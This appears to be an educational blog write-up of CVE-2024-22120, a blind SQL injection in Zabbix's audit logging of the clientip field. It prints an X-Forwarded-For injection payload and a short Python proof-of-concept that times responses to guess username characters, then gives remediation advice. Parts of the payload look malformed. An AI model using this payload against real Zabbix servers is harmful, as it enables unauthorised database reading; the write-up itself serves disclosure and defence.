A new vulnerability, CVE-2024-22120, impacts the widely used open-source monitoring tool, Zabbix. This issue allows attackers to exploit a flaw in how Zabbix records audit logs after running configured scripts. In simple words: Zabbix can be tricked into running custom SQL queries because it doesn’t properly handle the clientip field when logging script executions. This can lead to serious consequences, from data leaks to full database compromise.

This post explains the vulnerability in straightforward terms, provides a working proof of concept (PoC) code, and links to the original technical analysis for further reading.

What is Zabbix?

Zabbix is a popular, open-source server and network monitoring solution. It is widely used in enterprise environments to monitor IT infrastructure, send alerts, and automate tasks.

Where is the Problem?

1. Script Execution: Zabbix server administrators can configure scripts (like shell commands or custom programs) to be executed by the server.
2. Audit Log Entry: After running a script, Zabbix keeps an audit log entry. This entry records info like who ran the script, when, and the client’s IP address in a field named clientip.
3. SQL Injection Flaw: The issue is that the clientip field is not sanitized or validated. If an attacker controls this value, they can inject malicious SQL code right into the database.
4. Attack Result: This leads to time-based blind SQL injection, allowing attackers to read, alter, or delete data in the backend database—sometimes even to gain remote code execution, depending on configuration.

Step-by-Step Attack Scenario

1. Attacker has (limited) access to the Zabbix environment—maybe as a low-privileged user or via another flaw (like a XSS or SSRF).
2. Trigger script execution: The attacker sends a crafted request to Zabbix to run a user-defined script.
3. Inject SQL via clientip: In this request, the attacker makes sure to control the clientip value (for example, by adding a crafted HTTP header or by exploiting a proxy forward).
4. Audit Log is written: Zabbix logs the request, including the dangerous clientip into the SQL query. The unsanitized input is executed as part of the database query.
5. SQL injection works: The attacker can now, for example, make Zabbix “pause” for X seconds if a guess is correct (time-based blind SQL injection) to extract data bit by bit.

Real-Life Example: Time-based Blind SQL Injection

Let’s say you want to see if the first user in the users table has the letter “a” as the first character of their username. The PoC code below shows how an attacker might do it using a clientip value:

Injection Example (in HTTP header)

X-Forwarded-For: 127...1' OR IF(SUBSTRING((SELECT username FROM users LIMIT 1),1,1)='a', SLEEP(5), ) --

The X-Forwarded-For header often overrides the real client IP!

- The SQL injection payload makes the database sleep for 5 seconds if the first username starts with “a”.

Python PoC Script

Here’s a basic example using Python with the requests library, showing how to automate this attack:

import requests
import time

url = "http://your-zabbix.example.com/action_endpoint";

payload = "127...1' OR IF(SUBSTRING((SELECT username FROM users LIMIT 1),1,1)='a', SLEEP(5), ) -- "

headers = {
    "X-Forwarded-For": payload,
    # Add any other headers needed (e.g., cookies, auth)
    "Cookie": "zbx_sessionid=YOURSESSIONTOKEN"
}

data = {
    # fill in with required fields to trigger script execution
    "param1": "value"
}

start = time.time()
r = requests.post(url, headers=headers, data=data)
delta = time.time() - start

if delta > 4:
    print("SQLi guess likely TRUE!")
else:
    print("SQLi guess likely FALSE...")

> Note: You’ll need to supply real session cookies or valid Zabbix credentials, plus the correct script parameters.

Remediation

- Upgrade Zabbix: Check for Zabbix security advisories for an official patch or update.
- Sanitize Input: Any field written to SQL, especially those like clientip, should be sanitized or parametrized to prevent injections.

References

- Original advisory on Zabbix support tracker
- CVE-2024-22120 entry on NVD
- Zabbix Documentation: Audit Logs
- OWASP: SQL Injection

Conclusion

CVE-2024-22120 reminds us how even audit and logging features can become attack vectors when user-controlled input is not validated. Watch your input handling, apply updates promptly, and always test web headers like X-Forwarded-For for unusual abuse possibilities!

Stay safe, and keep your Zabbix servers patched!

*This write-up is an exclusive, simplified explanation tailored for infosec learners and Zabbix administrators. Feel free to share (with credit) and help spread awareness!*

Timeline

Published on: 05/17/2024 10:15:07 UTC
Last modified on: 06/04/2024 17:52:44 UTC